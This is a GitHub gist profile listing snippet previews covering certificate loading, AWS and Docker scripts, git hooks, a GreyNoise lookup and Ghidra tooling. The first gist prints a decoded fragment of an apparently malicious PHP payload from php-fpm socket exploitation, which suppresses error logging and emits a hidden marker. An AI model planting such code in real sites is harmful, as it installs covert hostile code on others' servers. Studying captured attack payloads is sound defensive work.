Skip to content

Instantly share code, notes, and snippets.

Avatar

Remco Verhoef nl5887

View GitHub Profile
@nl5887
nl5887 / base64-decoded-part.txt
Created Jun 1, 2020
Exploiting internet accessible php-fpm sockets
View base64-decoded-part.txt
<?php if(function_exists('error_reporting')){@error_reporting(0);}if(function_exists('ini_set')){@ini_set('error_reporting',0);@ini_set('error_log',NULL);@ini_set('log_errors',0);}$___=(isset($_SERVER["SCRIPT_NAME"])?$_SERVER["SCRIPT_NAME"]:(isset($_SERVER["SCRIPT_NAME"])?$_SERVER["SCRIPT_FILENAME"]:NULL));if($___==="/usr/bin/phar.phar"){echo"<span style='display:none'>".md5('lohpidr')."</span>";exit(0);}
@nl5887
nl5887 / example.go
Last active Apr 30, 2020
LoadCertificates will load all certificates and keys in multiple directories (using glob matching) and match certificates with their private keys.
View example.go
certificates, err := LoadCertificates("**.key", "**.crt")
if err != nil {
log.Fatal("Error loading x509 cert", rz.Err(err), rz.Any("cert-file", tlsCert))
}
tlsConfig := &tls.Config{
Certificates: certificates,
}
@nl5887
nl5887 / spotty.sh
Last active Mar 10, 2020
View spotty.sh
#!/usr/bin/env bash
AWS_CLI="aws --region $AWS_REGION"
PRICE=0.2
USER_NAME=#USERNAME#
KEY_NAME=#KEY NAME#
SECURITY_GROUP_ID=#SECURITY GROUP#
SUBNET_ID=#SUBNET#
VOLUME_SIZE=40
INSTANCE_TYPE=t2.2xlarge
@nl5887
nl5887 / start.sh
Last active Sep 12, 2019
Start docker tkiv cluster
View start.sh
export DATADIR=$(pwd)/tkiv-data/
for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
docker stop $s
docker rm $s
done
#ifconfig lo0 alias 192.168.1.101
#ifconfig lo0 alias 192.168.1.102
#ifconfig lo0 alias 192.168.1.103
@nl5887
nl5887 / precommit
Last active Aug 28, 2019
Git pre-commit script that will validate build
View precommit
#!/bin/bash
set -e
DEST=$(mktemp -d)
SRC=$(pwd)
pushd .
cd $DEST; git clone $SRC/.git . >/dev/null 2>&1
cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null
@nl5887
nl5887 / dockerize.sh
Created Aug 18, 2019
Docker build script that will only use git added files to container volume
View dockerize.sh
#!/bin/bash
DEST=$(mktemp -d)
SRC=$(pwd)
echo "Cloning $SRC into $DEST"
pushd .
cd $DEST
git clone $SRC/.git .
@nl5887
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
end
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end
@nl5887
nl5887 / 001_readme.md
Last active Feb 10, 2020
Metasploit Meterpreter handler servers (HTTP/HTTPS)
View 001_readme.md

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to censys.io and Jose.

@nl5887
nl5887 / 000_readme.md
Created Mar 7, 2019
View 000_readme.md
@nl5887
nl5887 / 00_readme.md
Last active Oct 7, 2019
Ghidra decompile
View 00_readme.md

Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
You can’t perform that action at this time.